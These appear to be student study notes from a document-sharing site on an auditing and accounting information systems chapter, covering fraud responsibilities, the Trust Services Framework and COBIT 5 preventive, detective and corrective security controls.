CH2 GRAMLING

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 12

CH2 Auditing: Fraud

 Auditing standards historically have reflected a belief that it is not reasonable to expect auditors to detect
cleverly implemented frauds.
 general public, as reflected in the orientation of the PCAOB, expects that auditors have a responsibility to detect
and report on material frauds, as noted below:
- The mission of the PCAOB is to restore the confidence of investors, and society generally, in the
independent auditors of companies.
- repeated revelations of accounting scandals and audit failures have seriously damaged public
confidence.
- The detection of material fraud is a reasonable expectation of users of audited financial statements.
Society needs and expects assurance that financial information has not been materially misstated
because fraud.
- Unless an independent audit can provide this assurance, it has little if any value to society.
 Professional auditing standards do Require the auditor to plan and perform an audit that will detect material
Misstatements resulting from fraud.
1. begin an audit with a brainstorming session that focuses on how And where fraud could occur within
the organization.
2. Auditors also need to Communicate with the audit committee and management about the risks of
Fraud and how they are addressed.
3. auditor should then plan the audit To be responsive to an organization’s susceptibility to fraud.

The Sarbanes–Oxley Act of 2002 as a Regulatory Response to Fraud

 ,since

the Sarbanes-Oxley Act was enacted, privately held organizations often

view the requirements of the Act as “best practice” and sometimes try to

adhere to the requirements even though they are not legally required to do so.

Due professional care – standard of care expected to be demonstrated by a competent auditing professional
Professional skepticism – attitude that includes a questioning mind and critical assessment of audit evidence
Financial statement audit
Systematic process of objectively obtaining and evaluating evidence regarding assertions about economic
actions and events to ascertain the degree of correspondence between those assertions and established
criteria; and communicating the results to interested users

objective of external auditing


provide opinions on the reliability of the financial statements
part of an integrated audit, - provide opinions on internal control effectiveness
 External auditing to have value, the public needs to have confidence in the objectivity and accuracy of the
opinions provided by external auditors.
 Free-market economy can exist only if there is sharing of reliable information among parties that have an
interest in the financial performance of an Organization
 external audit is intended to enhance that confidence that users can place on management-prepared financial
statement
 unqualified audit report - auditor has no reservations about management’s financial statements or internal
controls,
 adverse opinion - reservations about the effectiveness of the client’s internal controls
 If the auditor had reservations about the fair presentation of the financial statements, the audit report would
be modified to explain the nature of the auditor’s reservations
External Auditing: A Special Function

 most important Auditor client is the public, as represented by investors, lenders, workers, and others who
make decisions based on financial information about an organization.
 Auditing requires the highest level of technical competence, freedom from bias, and concern for the integrity
of the financial reporting process. In essence, auditors should view themselves as guardians of the capital
markets be relevant and timely
 The public expects auditors to
(a) find fraud,
(b) require accounting principles that best portray the spirit of the concepts adopted by accounting standard
setters, and
(c) be independent of management.
 auditors must not only be independent in fact, but they must act in a manner that ensures that they are
independent in appearance.
 management and the audit committee expect cost-effective audits.
 auditing profession pressures—keeping fees down, making careful decisions regarding independence, and
conducting a quality audit.

The Need for Unbiased Reporting and Independent Assurance


1. Effective capital markets require quality financial reporting. An organization’s
2. financial statements should reflect a true and fair view of the organization’s
3. financial results. The statements should not favor one user over another.

COBIT CONTROLS
 210 controls for ensuring information integrity
- Subset is relevant for external auditors
o IT control objectives for Sarbanes-Oxley, 2nd Edition
 AICPA and CICA information systems controls
- Controls for system and financial statement reliability

 Trust Services Framework - developed jointly by the American Institute of Certified Public
Accountants (AICPA) and the Canadian Institute of Chartered Accountants (CICA)
- provide guidance for assessing the reliability of information systems.
- organizes IT-related controls into five principles that jointly contribute to systems reliability:
1. Security—access (both physical and logical) to the
system and its data is controlled and restricted to
legitimate users.
- foundation of systems reliability
necessary for achieving each of other four
principles
2. Confidentiality—sensitive organizational
information (e.g., marketing plans, trade secrets) is
protected from unauthorized disclosure.
3. Privacy—personal information about customers,
employees, suppliers, or business partners is collected, used, disclosed, and maintained only
in compliance with internal policies and external regulatory requirements and is
protected from unauthorized disclosure.
4. Processing Integrity—data are processed accurately, completely, in a timely manner, and
only with proper authorization.
5. Availability—the system and its information are available to meet operational and
contractual obligations.

 Information security procedures restrict system access to authorized users only, thereby protecting the
confidentiality of sensitive organizational data and the privacy of personal information collected from
customers.
 Information security procedures protect information integrity by
preventing submission of unauthorized or fictitious transactions and
preventing unauthorized changes to stored data or programs.
 Information security procedures provide protection against a variety
of attacks, including viruses and worms, thereby ensuring that the
system is available when needed.
TWO FUNDAMENTAL INFORMATION SECURITY
CONCEPTS
I. Security Is a Management Issue, Not Just a Technology Issue
 Effective information security requires the deployment of technological tools such as firewalls, antivirus,
and encryption, senior management involvement and support throughout all phases of the security life cycle
 Security life cycle
1. First step: assess the information security-related threats that the organization faces and select an
appropriate response.
- Information security professionals possess the expertise
to identify potential threats and to estimate their
likelihood and impact
- senior management must choose which of the four risk
responses (reduce, accept, share, or avoid) is
appropriate to adopt so that the resources invested in
information security reflect the organization’s risk appetite
2. Second Step: developing information security policies and
communicating them to all employees.
- Senior management must decide the sanctions they are willing to impose for noncompliance
- active support and involvement of top management is necessary to ensure that information
security training and communication is taken seriously.
- To be effective, this communication must involve more than just handing people a written
document or sending them an e-mail message and asking them to sign an acknowledgment
that they received and read the notice.
- employees must receive regular, periodic reminders about security policies and training on
how to comply with them.
3. Step 3: acquisition or building of specific technological tools.
- Senior management must authorize investing the necessary resources to mitigate the threats
identified and achieve the desired level of security.
4. Step 4: entails regular monitoring of performance to evaluate the effectiveness of the
organization’s information security program.
- management must periodically reassess the organization’s risk response
- when necessary, make changes to information security policies and invest in new solutions to
ensure that the organization’s information security efforts support its business strategy in a
manner that is consistent with management’s risk appetite.
II. Defense-in-Depth and the Time-Based Model of Information Security
 defense-in-depth – Employing multiple layers of controls to avoid a single point-of-failure.
- example, organizations use not only firewalls but also multiple authentication methods
(passwords, tokens, and biometrics) to restrict access to their information systems.
- overlapping, complementary, and redundant controls increases overall effectiveness
because if one control fails or gets circumvented, another may function as planned.
- typically involves the use of a combination of preventive, detective, and corrective controls.
- preventive controls limit actions to specified individuals in accordance with the
organization’s security policy
 time-based model of security - Implementing a combination of preventive, detective and corrective
controls that protect information assets long enough to enable an organization to recognize that an attack is
occurring and take steps to thwart it before any information is lost or compromised.
- a means for management to identify the most cost-effective approach to improving
security by comparing the effects of additional investments in preventive, detective, or
corrective controls
- This objective can be expressed in a formula that uses the following three variables:
P = the time it takes an attacker to break through the organization’s preventive controls
D = the time it takes to detect that an attack is in progress
C = the time it takes to respond to the attack and take corrective action
- Those three variables are then evaluated as follows: If P > D + C, then the organization’s
security procedures are effective. Otherwise, security is ineffective.

Understanding Targeted Attacks


1. Conduct reconnaissance
- Objective: to learn as much as possible about the target and to identify potential
vulnerabilities.
2. Attempt social engineering
- use the information obtained during their initial reconnaissance to grant them access.
- social engineering - Using deception to obtain unauthorized access to information resources.
- ex. impersonate an executive to call a newly hired administrative assistant,
pose as a clueless temporary worker who cannot log onto the system, spear
phishing, click on an embedded link or open an attachment making a Trojan
horse program executed that enables the attacker to obtain access to the system
3. Scan and map the target.
- conduct more detailed reconnaissance to identify potential points of remote entry.
4. Research.
- conduct research to find known vulnerabilities for those programs and learn how to take
advantage of those vulnerabilities.
5. Execute the attack.
- The criminal takes advantage of a vulnerability to obtain unauthorized access to the target’s
information system.
6. Cover tracks.
- cover their tracks and create “back doors” that they can use to obtain access if their initial attack is
discovered and controls are implemented to block that method of entry.
PREVENTIVE CONTROLS
People: Creation of a “security-conscious” culture
- create either an internal environment that supports and reinforces sound internal control or one that
effectively negates written control policies
- top management must not only communicate the organization’s security policies, but must also lead by example
People: Training
- COBIT 5 identifies employee skills and competencies as another critical enabler for effective information
security.
- training is a critical preventive control.
- security awareness training is discussed as a key practice to support several of COBIT 5’s 32 management
processes.
- Training is especially needed to educate employees about social engineering attacks.
- trained to not allow other people to follow them through restricted access entrances. (Piggybacking)
 Role-playing exercises are particularly effective for increasing sensitivity to and skills for dealing with
social engineering attacks
- Security awareness training is important for senior management (e.g. spear phishing targeted at them)
- Training of information security professionals
 New developments in technology continuously create new security threats and make old solutions
obsolete.
- organization’s investment in security training will be effective only if management clearly demonstrates that it
supports employees who follow prescribed security policies.
 visible top management support for security enhances the effectiveness of all security policies.
 Top management needs to support the enforcement of sanctions, up to and including dismissal, against
employees who willfully violate security policies.

Process: User Access Controls


- organizations need to implement a set of controls designed to protect their information assets from unauthorized
use and access by employees.
- COBIT 5 management practice DSS05.04
 stresses the need for controls to manage user identity and logical access so that it is possible to
uniquely identify everyone who accesses the organization’s information system and track the actions that
they perform
 involves the use of two related but distinct types of user access controls: authentication controls and
authorization controls.
 Authentication controls - restrict who can access the organization’s information system
 Authorization controls - limit what those individuals can do once they have been granted access.

 Authentication Controls
o authentication - Verifying the identity of the person or device attempting to access the system.
o Objective: to ensure that only legitimate users can access the system.
o Three types of credentials can be used to verify a person’s identity:
1. Something they know, such as passwords or personal identification numbers (PINs)
2. Something they have, such as smart cards or ID badges
3. Some physical or behavioral characteristic (referred to as a biometric identifier), such as
fingerprints or typing patterns
- biometric identifier - A physical or behavioral characteristic that is used as an
authentication credential
o Passwords - most commonly used authentication method, and also the most controversial.
o Individually, each authentication method has its limitations.
 Passwords can be guessed, lost, written down, or given away.
 Physical identification techniques (cards, badges, USB devices, etc.) can be lost, stolen, or
duplicated.
 Even biometric techniques are not yet 100% accurate, sometimes rejecting legitimate users (e.g.,
voice recognition systems may not recognize an employee who has a cold) and sometimes
allowing access to unauthorized people.
 Some biometric techniques, such as fingerprints, carry negative connotations that may hinder
their acceptance.
 Biometric templates, such as the digital representation of an individual’s fingerprints or voice,
must be stored somewhere because biometric characteristics, unlike passwords or physical tokens,
cannot be replaced or changed.
o multifactor authentication - use of two or more types of authentication credentials in conjunction to
achieve a greater level of security
- Example - smart card in a card reader and enter a password provides much
stronger authentication than using either method alone.
o multimodal authentication - use of multiple authentication credentials of the same type to achieve a
greater level of security
- Example: online banking sites use several things that a person knows (password,
user ID, and recognition of a graphic image) for authentication.
o Both multifactor authentication and multimodal authentication are examples of applying the principle of
defense-in-depth.
o authenticate not only people, but also every device attempting to connect to the network.
- Media access control (MAC) address - unique identifier each NIC
- restrict network access to only corporate-owned devices by comparing the device’s MAC to a
list of recognized MAC addresses.
- a stronger way to authenticate devices involves the use of digital certificates that employ
encryption techniques to assign unique identifiers to each device.
 Authorization Controls
o authorization - The process of restricting access of authenticated users to specific portions of the
system and limiting what actions they are permitted to perform
- COBIT 5 management practice DSS06.03
- objective: structure an individual employee’s rights and privileges in a manner that
establishes and maintains adequate segregation of duties.
- Example: a customer service representative should not be authorized to access the
payroll system.
o Authorization controls are often implemented by creating
an access control matrix
- access control matrix - A table used to
implement authorization controls
o compatibility test - Matching the user’s authentication
credentials against the access control matrix to determine
whether that employee should be allowed to access that
resource and perform the requested action
o regularly update the access control matrix to reflect changes in job duties due to promotions or
transfers. Otherwise, over time an employee may accumulate a set of rights and privileges that is
incompatible with proper segregation of duties
o to achieve even greater control and segregation of duties: use business process management systems
to embed authorization into automated business processes, rather than relying on a static access control
matrix
- Example: particular employee may be permitted to access credit information about the customer
who is currently requesting service, but simultaneously prevented from “browsing” through the rest
of the customer file
IT Solutions: Antimalware Controls
- Malware (e.g., viruses, worms, keystroke logging software, etc.) is a major threat.
 can damage or destroy information or provide a means for unauthorized access.
 COBIT 5 section DSS05.01 lists malware protection as one of the keys to effective security,
specifically recommending:
1. Malicious software awareness education,
2. Installation of antimalware protection tools on all devices,
3. Centralized management of patches and updates to antimalware software,
4. Regular review of new malware threats,
5. Filtering of incoming traffic to block potential sources of malware, and
6. Training employees not to install shared or unapproved software.

IT Solutions: Network Access Controls


- Most organizations provide employees, customers, and suppliers with
remote access to their information systems.
 Usually access occurs via the Internet (some own proprietary
networks or provide direct dial-up access by modem)
- COBIT 5 management practice DSS05.02, which addresses security of
the organization’s network and all means of connecting to it.
 Perimeter Defense: Routers, Firewalls, and Intrusion Prevention
Systems
1. border router - A device that connects an organization’s
information system to the Internet.
2. firewall - A special-purpose hardware device or software
running a general-purpose computer that controls both
inbound and outbound communication between the
system behind the firewall and other networks.
- behind the border router
3. demilitarized zone (DMZ) – A separate network located
outside the organization’s internal information system that permits controlled access from the Internet.
 How Information Flows on Networks: Overview of TCP/IP and Ethernet
- when you send a file (document, spreadsheet, database, etc.) to another person or to a printer, the entire
file seldom is transmitted intact.
- In most cases, it is broken up into a series of small pieces that are individually sent and reassembled upon
delivery.
 almost every local area network uses the Ethernet protocol, which is designed to transmit information
in packets with a maximum size of about 1,440 bytes (1.4 kB).
- large files (larger than 1 MB) are divided into thousands of packets.
 Each packet must be properly labeled so that the entire file can be correctly reassembled at the
destination.
- The information to do accomplish that is contained in the:
 Transmission Control Protocol (TCP) - TCP header contains fields that specify the sequential
position of that packet in relation to the entire file
and the port numbers (addresses) on the sending and
receiving devices from which the file originates and
where it is to be reassembled.
 Internet Protocol (IP) – IP header contains fields that
specify the network address (IP address) of the
sending and receiving device
 routers - Special purpose devices that are
designed to read the source and destination
address fields in IP packet headers to decide
where to send (route) the packet next.
 Ethernet headers - contains the MAC addresses of the
sending and receiving device, which is used to control
Figure 1 Packet Structure
the flow of traffic on the local area network (LAN)

 Controlling Access by Filtering Packets.


- access control list (ACL) - A set of IF-THEN rules used to determine what to do with arriving packets
- If the packet’s destination IP address is the organization, the rules in the border router’s ACL examine the
source address field in the IP packet header to block packets from specific undesirable sources (e.g., known
gambling or porn sites).
 packet filtering - A process that uses various fields in a packet’s IP and TCP headers to decide what
to do with the packet.
- fast and can catch patently undesirable traffic, but its effectiveness is limited.
- Undesirable traffic can get through if the source IP address is not on the list of
unacceptable sources or if the sender purposely disguises the true source address.
- deep packet inspection – A process that examines the data in the body of a TCP
packet to control traffic, rather than looking only at the information in the IP and
TCP headers.
- more effective because package is opened and inspected
actual data (i.e., the portion of the file contained in the TCP
packet) are examined,
- All other packets with the organization’s IP address in the destination field are
passed to the main firewall for further screening.
- The rules in the organization’s main firewall’s ACL look at other fields in the IP and
TCP packet headers to determine whether to block the incoming packet or permit it
to enter.
- firewalls do not block all traffic, but only filter it.
 firewall’s actions are limited to protecting the web server.
4. intrusion prevention systems (IPS) - Software or hardware that monitors patterns in the traffic flow
to identify and automatically block attacks
- examining a pattern of traffic is often the only way to identify undesirable activity
- use two primary techniques to identify undesirable traffic patterns:
1. simplest approach - to compare traffic patterns to a database of
signatures of known attacks.
2. more complicated approach - developing a profile of “normal” traffic and
using statistical analysis to identify packets that do not fit that profile.
- it blocks not only known attacks, for which
signatures already exist, but also any new attacks
that violate the standards
- network IPS - could identify that a sequence of packets attempting to connect to various TCP ports on
the e-commerce web server is an indicator of an attempt to scan and map the web server
- consists of a set of sensors and a central monitor unit that analyzes the data collected.
- Sensors must be installed on each network segment over which real-time monitoring is desired
IPS problems: danger of false alarms, which results in blocking legitimate traffic
- deep packet inspection slows overall throughput
- IPSs do not replace the need for firewalls, they are a complementary tool and provide yet another layer of
perimeter defense

 Using Defense-in-Depth to Restrict Network Access


- use of multiple perimeter filtering devices is more efficient and effective
- most organizations use border routers to quickly filter out obviously bad packets and pass the rest to
- the main firewall.
- The main firewall does more detailed checking, and then other firewalls perform deep packet inspection to
more fully protect specific devices such as the organization’s web server and e-mail server.
- IPS monitors the traffic passed by the firewalls to identify and block suspicious network traffic patterns
that may indicate that an attack is in progress.
- concept of defense-in-depth: the use of multiple internal firewalls to segment different departments within
the organization.
- Internal firewalls help to restrict what data and portions of the organization’s information system particular
employees can access

 Securing Dial-Up Connections


- Remote Authentication Dial-In User Service (RADIUS) - A standard method for verifying the identity
of users attempting to connect via dial-in access
- Dial-in users connect to a remote access server
and submit their log-in credentials
- only after the user has been authenticated is access to the internal corporate network granted.
- Modems are cheap and easy to install, so employees are often tempted to install them on their desktop
workstations without seeking permission or notifying anyone that they have done so.
- not filtered by the main firewall
- seldom configure any strong authentication controls.
- a single unauthorized (“rogue”) modem connected to an employee’s desktop workstation creates a
“back door” through which attackers can often easily compromise
- most efficient and effective way to periodically check for the existence of rogue modems is to use war dialing
software
o war dialing - Searching for an idle modem by programming a computer to dial thousands of phone lines
 Securing Wireless Access
- Wireless access is convenient and easy, but it also provides another venue for attack and extends the
perimeter that must be protected
- following procedures need to be followed to adequately secure wireless access:
o Turn on available security features.
o Authenticate all devices attempting to establish wireless access to the network before assigning them an
IP address.
- can be done by treating incoming wireless connections as attempts to access the network from the
Internet and routing them first through a RADIUS server or other authentication device.
o Configure all authorized wireless devices to operate only in infrastructure mode, which forces the
device to connect only to wireless access points. (Wireless devices can also be set to operate in ad hoc
mode, which enables them to communicate directly with any other wireless device. This is a security
threat because it creates peer-to-peer networks with little or no authentication controls.)
o Use noninformative names for the access point’s address, which is called a service set identifier
(SSID). SSIDs such as “payroll,” “finance,” or “R&D” are more obvious targets to attack than devices
with generic SSIDs such as “A1” or “X2.”
o Reduce the broadcast strength of wireless access points, locate them in the interior of the building, and
use directional antennas to make unauthorized reception off-premises more difficult.
- Special paint and window films can also be used to contain wireless signals within a building.
o Encrypt all wireless traffic.
- essential to protect the confidentiality and privacy of wireless communications because they are
transmitted “over the air” and, therefore, are inherently susceptible to unauthorized interception
-
IT Solutions: Device and Software Hardening Controls
- endpoints - Collective term for the workstations, servers, printers, and other devices that comprise an
organization’s network
- COBIT 5 management practice DSS05.03 describes the activities involved in managing endpoint security.
- Three areas deserve special attention:
(1) endpoint configuration
- Default configurations of most devices typically turn on a large number of optional settings that are
seldom, if ever, used.
- default installations of many operating systems turn on many special-purpose programs, called
services, that are not essential
- vulnerabilities - Flaws in programs that can be exploited to either crash the system or take control of it.
- vulnerability scanners - Automated tools designed to identify whether a given system possesses any
unused and unnecessary programs that represent potential security threats
- hardening - The process of modifying the default configuration of endpoints to eliminate unnecessary
settings and services
- every endpoint needs to be running antivirus and firewall software that is regularly updated
(2) user account management
- COBIT 5 management practice DSS05.04 stresses the need to carefully manage all user accounts,
especially those accounts that have unlimited (administrative) rights on that computer.
- Administrative rights are needed in order to install software and alter most configuration settings.
- Therefore, employees who need administrative powers on a particular computer should be assigned two
accounts:
1. has administrative rights - only when they need to perform some action, such as installing new
software, which requires administrative rights
2. has only limited privileges - to perform routine daily duties
- change the default passwords on all administrative accounts that are created during initial installation of
any software or hardware because those account names and their default passwords are publicly available
on the Internet
(3) software design.
 Buffer overflows, SQL injection, and cross-site scripting are common examples of attacks against the
software running on websites
 Buffer overflows: exploit poorly written software that does not thoroughly check user-supplied input
prior to further processing take control of the machine by sending carefully crafted commands in the
excess data.
 SQL injection attacks: occur whenever web application software that interfaces with a database server
does not filter user input, thereby permitting an attacker to embed SQL commands within a data
entry request and have those commands executed on the database server.
 Cross-site scripting attacks: occur when web application software does not carefully filter user input
before returning any of that data to the browser, in which case the victim’s browser will execute any
embedded malicious script
 common theme in these attacks: failure to “scrub” user input to remove potentially malicious code.
 section BAI03 of the COBIT 5 framework specifies the need to carefully design security into all new
applications
 section APO10 prescribes best practices for managing the risks associated with purchasing software
IT SOLUTIONS: ENCRYPTION
 Encryption provides a final layer of defense to prevent unauthorized access to sensitive information.
 achieving the security principles of protecting confidentiality of organizational information and the privacy of
personal information collected from customers, employees, and business partners.

Physical Security: Access Controls


 a keystroke logging device that captures a user’s authentication credentials,
 someone with unsupervised physical access could also insert special “boot” disks that provide direct access to
every file on the computer and then copy sensitive files to a portable device or s could simply remove the hard
drive or even steal the entire computer.
 COBIT 5 management practice DSS05.05 describes best practices regarding physical access control
 Physical access control begins with entry points to the building itself
- Ideally, only one regular entry point that remains unlocked during normal office hours.
- emergency exits should be connected to an alarm system that is automatically triggered
- a security guard should be stationed at the main entrance to verify the identity of employees.
- Visitors should be required to sign in and be escorted by an employee wherever they go in the building.
- physical access to rooms should be securely locked and all entry/exit monitored by closed-circuit
television systems.
- Access to the wiring used in the organization’s LANs also needs to be restricted in order to prevent
wiretapping
 Ideally, employees should not store any sensitive information on laptops or other personal devices or it
should be encrypted so that if the device is lost or stolen the information will be inaccessible.
 COBIT 5 management practice DSS05.06 stresses the importance of also restricting physical access to
network printers, because they often store document images on their hard drives.
 especially promising way to achieve defense-in-depth is to integrate physical and remote access control systems.

CHANGE CONTROLS AND CHANGE MANAGEMENT


 Change control and change management - The formal process used to ensure that modifications to
hardware, software, or processes do not reduce systems reliability.
o often results in better operating performance because there are fewer problems to fix
o experience lower costs when security incidents do happen
o most important characteristics that distinguishes top-performing organizations from all others.
o two of COBIT 5’s key processes deal with:
1. managing change (BAI06)
2. procedures for testing and transitioning to new solutions (BAI07).
o Characteristics of a well-designed change control and change management process include:
 Documentation of all change requests, identifying the nature of the change, its rationale,
date of the request, and outcome of the request.
 Documented approval of all change requests by appropriate levels of management.
- important that senior management review and approve major changes to processes and
systems in order to ensure that the proposed change is consistent with the organization’s
long-term strategic plans.
 Testing of all changes in a separate system, not the one used for daily business processes.
- This reduces the risk that “bugs” in modifications do not disrupt normal business.
 Conversion controls to ensure that data is accurately and completely transferred from the
old to the new system.
- Internal auditors should review the conversion process.
 Updating of all documentation (program instructions, system descriptions, procedures manuals,
etc.) to reflect the newly implemented changes.
 A special process for timely review, approval, and documentation of “emergency changes” as
soon after the crisis as is practical.
- All emergency changes need to be logged to provide an audit trail.
- A large number or marked increase in the number of emergency changes is a potential red
flag of other problems (poor configuration management procedures, lack of preventive
maintenance, or political “game-playing” to avoid the normal change control process).
 Development and documentation of “backout” plans to facilitate reverting to previous
configurations if the new change creates unexpected problems.
 Careful monitoring and review of user rights and privileges during the change process to
ensure that proper segregation of duties is maintained.
DETECTIVE CONTROLS
- COBIT 5 management practice DSS05.07 describes the activities that organizations also need to enable timely
detection of intrusions and problems
- four types of detective controls:
1) Log Analysis - process of examining logs to identify evidence of possible attacks.
- logs form an audit trail of system access and those logs are of value only if they are routinely
examined.
- Logs need to be analyzed regularly to detect problems in a timely manner
Problems: logs can quickly grow in size
many devices produce logs with proprietary formats, making it hard to correlate
and summarize logs from different devices.
- log analysis ultimately requires human judgment to interpret the reports and identify situations
that are not “normal.”

2) Intrusion Detection Systems (IDS) - A system that creates logs of all network traffic that was permitted to
pass the firewall and then analyzes those logs for signs of attempted or successful intrusions
o Network IDSs consist of a set of sensors and a central monitoring unit that create logs of network traffic
that was permitted to pass the firewall and then analyze those logs for signs of attempted or successful
intrusions.
- functions by comparing observed traffic to its rulebase
main difference between an IDS and an IPS
IDS - only produces a warning alert when it detects a IPS not only issues an alert but also automatically takes
suspicious pattern of network traffic; steps to stop a suspected attack.
- it is then up to the human responsible for monitoring
the IDS to decide what course of action to take.

3) Penetration Testing -
- COBIT 5 control processes MEA01 and MEA02 state the need to periodically test the effectiveness of
business processes and internal controls (including security procedures).
- penetration test - An authorized attempt to break into the organization’s information system
- provides a more rigorous way to test the effectiveness of an organization’s information security.

4) Continuous Monitoring
- COBIT 5 management practice APO01.08 stresses the importance of continuously monitoring both
employee compliance with the organization’s information security policies and overall performance of
business processes.
- effectively monitoring performance requires judgment and skill

CORRECTIVE CONTROLS
- COBIT 5 management practice MEA01.05 explains, organizations also need procedures to undertake timely
corrective actions.
- Many corrective controls rely on human judgment
- effectiveness depends to a great extent on proper planning and preparation.
- COBIT 5 devotes two sections to the entire process:
1. managing and responding to incidents (DSS02)
2. problems (DSS03).
- three particularly important corrective controls:
1. Computer Incident Response Team (CIRT) - A team that is responsible for dealing with major security
incidents.
- should include not only technical specialists but also senior
operations management
- CIRT should lead the organization’s incident response process through the following four steps:
(1) Recognition that a problem exists.
- Typically occurs when an IPS or IDS signals an alert, but it can also be the result of log
analysis by a systems administrator.
(2) Containment of the problem.
- Once an intrusion is detected, prompt action is needed to stop it and to contain the damage.
(3) Recovery.
- Damage caused by the attack must be repaired.
- may involve restoring data from backup and reinstalling corrupted programs
(4) Follow-up.
- Once recovery is in process, the CIRT should lead the analysis of how the incident occurred.
- it needs to immediately involve forensic experts to ensure that all possible evidence is
collected and maintained in a manner that makes it admissible for use in court.
- Communication is vital throughout all four steps in the incident response process.
- multiple methods of notifying members of the CIRT are necessary
- important to practice the incident response plan, including the alert process.
- It is much better to discover a gap in the plan during a practice run than when a real incident occurs.
- Regular practice helps identify the need for change in response to technological changes.
2. Chief Information Security Officer (CISO)
- CISO - independent of other information systems functions and should report to either the chief
operating officer (COO) or the chief executive officer (CEO).
- must understand the company’s technology environment and work with the chief information officer
(CIO) to design, implement, and promote sound security policies and procedures.
- an impartial assessor and evaluator of the IT environment.
- have responsibility for ensuring that vulnerability and risk assessments are performed regularly and
that security audits are
- to work closely with the person in charge of physical security, because unauthorized physical access can
allow an intruder to bypass the most elaborate logical access controls
3. Patch Management
- exploit - A program designed to take advantage of a known vulnerability.
- patch - Code released by software developers that fixes a particular vulnerability
- sometimes create new problems because of unanticipated side effects.
- patch management - The process of regularly applying patches and updates to software.
- Fix known vulnerabilities by installing the latest updates
 Security programs, operating systems, application programs

SECURITY IMPLICATIONS OF VIRTUALIZATION AND THE CLOUD


 virtualization - Running multiple systems simultaneously on one physical computer.
 cloud computing - Using a browser to remotely access software applications (software as a service), data
storage devices (storage as a service), hardware (infrastructure as a service), and entire application
environments (platform as a service)., data storage, hardware, and applications
- referred to as a “private,” “public,” or “hybrid” cloud depending upon whether the remotely
accessed resources are entirely owned by the organization, a third party, or a mix of the two,
respectively
- advantages: reducing costs
- the centralization of computing resources with cloud computing (whether public,
private, or hybrid) makes it easier to change software and hardware
- improving flexibility.
- public clouds - accessible via the Internet, the authentication process is the primary means of
protecting your data stored in the cloud from unauthorized access.
- raise concerns about the other aspects of systems reliability (confidentiality,
privacy, processing integrity, and availability) because the organization is
outsourcing control of its data and computing resources to a third party.
 Type 2 SOC 2 report describes the controls used by a service provider (e.g., a cloud provider, payroll service,
etc.) and a CPA’s opinion about the operating effectiveness of those controls
 Virtual firewalls, IPS, and IDS need to be deployed both by cloud providers, to isolate virtual machines and
cloud
 customers from one another, and by organizations to properly restrict employee access to only those portions of
the system necessary to perform their assigned jobs
 virtualization and cloud computing can have either positive or negative effects on the overall level of
information security, depending upon how well the organization or the cloud provider implements the various
layers of preventive, detective, and corrective controls.

You might also like